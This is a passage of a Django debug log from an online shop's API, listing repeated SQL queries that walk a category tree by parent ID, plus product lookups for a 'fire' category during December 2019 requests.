BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:47:42,063 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:47:42,065 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:47:42,067 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:47:42,069 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:47:42,072 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:47:42,075 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:47:42,077 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:47:42,079 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:47:42,081 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:47:42,084 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:47:42,087 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:47:42,089 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:47:42,092 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:47:42,094 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:47:42,096 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:47:42,098 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 12:47:42,101 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 12:47:42,104 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 12:47:42,106 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 12:47:42,109 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 12:47:42,111 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 12:47:42] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 12:47:44,104 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:47:44,109 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:47:44] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:48:36,543 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:48:36,547 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:48:36] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:48:39,761 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 12:48:39,766 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 12:48:39] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 12:48:47,313 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 12:48:47,321 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 12:48:47,326 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 12:48:47,329 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 12:48:47,333 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 12:48:47,336 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 12:48:47,338 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 12:48:47,342 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 12:48:47,344 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 12:48:47,348 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 12:48:47,351 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 12:48:47,353 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 12:48:47,356 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 12:48:47,359 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 12:48:47,364 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 12:48:47,367 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 12:48:47,369 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 12:48:47,372 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 12:48:47,375 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 12:48:47,379 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 12:48:47,382 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 12:48:47,385 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 12:48:47,387 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 12:48:47,390 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 12:48:47,393 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 12:48:47,397 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 12:48:47,400 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 12:48:47,403 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 12:48:47,405 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 12:48:47,408 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 12:48:47,412 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 12:48:47,414 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 12:48:47,417 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 12:48:47,419 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 12:48:47,422 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 12:48:47,426 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 12:48:47,429 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 12:48:47,432 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 12:48:47,435 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 12:48:47,438 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 12:48:47,440 utils 20136 140506667599616 